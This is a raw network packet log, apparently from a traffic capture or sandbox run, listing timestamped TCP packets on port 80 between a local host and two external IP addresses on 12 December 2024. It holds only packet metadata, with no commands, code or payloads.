                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149806976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149872065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.149990082 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.150027037 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.150707006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.150816917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.150882959 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.151721001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.151844025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.151913881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.152750015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.153434992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.153512001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.153745890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.153810978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.153883934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.154819965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.155165911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.155241966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.155848026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.155864000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.155939102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.156800985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.157597065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.157676935 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.157809973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.157895088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.157960892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.158871889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.159039021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.159100056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.159915924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.160012960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.160078049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.160864115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.160993099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.161053896 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.161967039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.161978960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.162050009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.163137913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.163150072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.163218021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.163959980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.164154053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.164215088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.164941072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.165051937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.165113926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.165998936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.166135073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.166208029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.166954041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.167217970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.167289019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.167954922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.168076038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.168148994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.169004917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.169017076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.169081926 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.169974089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.170200109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.170272112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.170990944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.171145916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.171221018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.172000885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.173084021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.173132896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.173144102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.173161983 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.173176050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.174074888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.175240993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.175251961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.175266027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.175324917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.175657034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.176100969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.176311970 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.176393986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.177125931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.177228928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.177299976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.178183079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.178231955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.178299904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.179174900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.179348946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.179419994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.180174112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.181219101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.181230068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.181241035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.181298018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.181580067 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.182203054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.183269024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.183279991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.183319092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.183352947 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.183660030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.184267044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.185236931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.185246944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.185266018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.185308933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.185323954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.186228991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.187028885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.187103033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.187262058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.187278986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.187341928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.188270092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.189287901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.189300060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.189323902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.189357042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.189379930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.190279007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.190332890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.190406084 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.191329002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.191941977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.192008972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.192446947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.192461014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.192527056 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.193408966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.193418980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.193484068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.194418907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.194430113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.194525957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.195414066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.195425987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.195501089 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.196389914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.197431087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.197441101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.197460890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.197504997 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.197523117 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.198419094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.199465990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.199476957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.199487925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.199544907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.199562073 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.200445890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.200782061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.200881958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.201452017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.201528072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.201617002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.202560902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.244143009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291063070 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291162014 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291260004 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291503906 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291559935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.291755915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.292023897 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.292555094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.292599916 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.292850018 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.292891979 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.293423891 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.293469906 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.294433117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.294445992 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.294460058 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.294496059 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.294531107 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.295402050 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.295469999 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.295542955 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.295600891 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.296375990 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.296874046 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.296930075 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.297343016 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.297386885 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.297804117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.297838926 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.298336983 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.298441887 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.298489094 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.299331903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.299391985 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.299595118 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.299645901 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.300272942 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.300326109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.300394058 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.300438881 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.301280975 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.301331043 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.301362038 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.301403046 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.302243948 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.302290916 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.302293062 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.302330971 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.303198099 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.303246021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.303320885 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.303366899 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.304193974 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.304305077 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.304359913 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.304359913 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.305145979 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.305186987 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.305236101 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.306126118 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.306176901 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.306509972 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.306593895 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.307091951 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.307141066 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.307502031 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.307552099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.308078051 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.308130980 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.308186054 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.309178114 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.309230089 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.309586048 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.309629917 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.310055017 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.310096025 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.310142994 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.310182095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.311041117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.311098099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.311336040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.311384916 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.312050104 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.312138081 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.312191010 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.313024998 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.313071012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.313103914 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.313143015 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314045906 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314065933 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314099073 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314121008 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314923048 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.314971924 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.315016985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.315058947 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.316096067 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.316909075 CET8049957185.215.113.16192.168.2.10
